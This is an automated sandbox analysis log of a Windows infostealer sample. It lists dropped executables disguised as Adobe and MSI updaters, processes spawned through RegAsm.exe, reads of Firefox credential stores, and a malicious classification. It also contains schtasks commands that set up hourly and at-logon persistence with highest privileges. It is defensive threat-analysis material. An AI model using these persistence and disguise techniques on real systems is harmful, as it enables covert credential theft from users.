Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00439BB0	12_2_00439BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403CD0	12_2_00403CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00405CA0	12_2_00405CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434D40	12_2_00434D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041EE00	12_2_0041EE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041FE00	12_2_0041FE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00439ED0	12_2_00439ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00404F90	12_2_00404F90
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00EA68B8	17_2_00EA68B8
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00EA3320	17_2_00EA3320
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00EA68B8	20_2_00EA68B8
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00EA3320	20_2_00EA3320

Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D

Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: String function: 00BF4F90 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: String function: 004E4F90 appears 48 times
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: String function: 00E9A6BE appears 42 times
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: String function: 00E94F90 appears 96 times
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: String function: 00E9F073 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408490 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408C20 appears 153 times

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688

Source: tMO4FVIc9l.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lumma2305[1].exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9894404217479674
Source: xq6J5KlULX6jlR3rET0T.exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9894404217479674
Source: AdobeUpdaterV202.exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9894404217479674
Source: MSIUpdaterV202.exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9894404217479674

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/32@3/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0042D2F0 CoCreateInstance,

12_2_0042D2F0

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3108

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

File created: C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw

Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: tMO4FVIc9l.exe, 00000000.00000003.2143660806.0000000006115000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144177194.0000000006125000.00000004.00000020.00020000.00000000.sdmp, rg706_nABxIULogin Data For Account.0.dr, Oh9vbPMur9FiLogin Data.0.dr, D7xhTl4YAcm4Login Data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: tMO4FVIc9l.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

File read: C:\Users\user\Desktop\tMO4FVIc9l.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tMO4FVIc9l.exe "C:\Users\user\Desktop\tMO4FVIc9l.exe"
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: srvcli.dll	Jump to behavior
